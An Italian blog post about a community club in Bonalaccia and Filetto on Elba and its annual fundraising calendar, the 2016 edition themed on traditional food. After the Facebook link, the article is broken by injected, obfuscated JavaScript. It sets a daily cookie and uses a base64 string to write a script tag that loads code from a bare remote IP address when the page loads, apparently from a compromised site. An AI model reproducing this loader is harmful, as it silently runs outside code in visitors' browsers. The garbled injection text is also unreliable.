Il Calendario della Bonalaccia et Filetto

La Bonalaccia e Il Filetto (o Bonalaccia et Filetto, per i locali) sono due piccole frazioni residenziali del Comune di Campo nell’Elba, sdraiate nella Piana tra l’aeroporto de La Pila e la spiaggia della Foce, da sempre colorate dal verde di vigneti e di orti spaziosi e ben curati.

Il Circolino, alla Bonalaccia, fu inaugurato nel 1921. Superò la Grande Guerra sotto il dominio nazista e raccolse discorsi e storie della gente locale fino agli anni 70, quando, a mano a mano che l’agricoltura e l’allevamento lasciavano il posto alle frenetiche attività turistiche, le campagne furono abbandonate con tutte le loro semplici, ma sane abitudini. Chiuso e inutilizzato, il Circolino stava letteralmente cadendo a pezzi.

Fortunatamente, non molto tempo fa, un manipolo di residenti volenterosi ha deciso di riportare agli antichi fasti l’edificio, ripristinandone anche la principale funzione: lo stare insieme. Per raccogliere i fondi necessari, i soci organizzano diverse attività gastronomiche, feste tradizionali, gare sportive e, dal 2011, coinvolgendo fotografi e attori locali pubblicano quello che è diventato ormai un cult: il Calendario della Bonalaccia et Filetto.

Ogni anno, cambiano il tema e le location, ma il leitmotiv è sempre quello: come eravamo (o com’eremo, per dirla all’elbana). Per il 2016 è stato scelto il cibo (nel video, il Dietro le Quinte) e nel manualetto in carta paglia di ricette tipiche, venduto insieme al Calendario, in seconda di copertina si legge:

Il cibo a saperlo leggere è un libro di memorie e, se ci viene dalla terra in cui siamo nati, è anche un pezzo importante della nostra storia… 

A ribadire questo concetto genuino, mese dopo mese sono raccolte poesie, proverbi, curiosità e parole perse, che fanno di quest’almanacco nato per scherzo una vero e proprio tesoro culturale.

Inoltre, dato l’intento e il costo contenuto, è un’ottima idea regalo: utile, bello da vedere, interessante da leggere. Tutte le info sulla pagina Facebo_ok_ del Circolo. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Silvia Bracci

Grafica Pubblicitaria fiorentina di nascita, Guida Ambientale Escursionistica elbana d'adozione, mi occupo di tutto ciò che è Green e Natura, raccontando le meraviglie della montagna in mezzo al mare.

Nessun commento

Aggiungi commento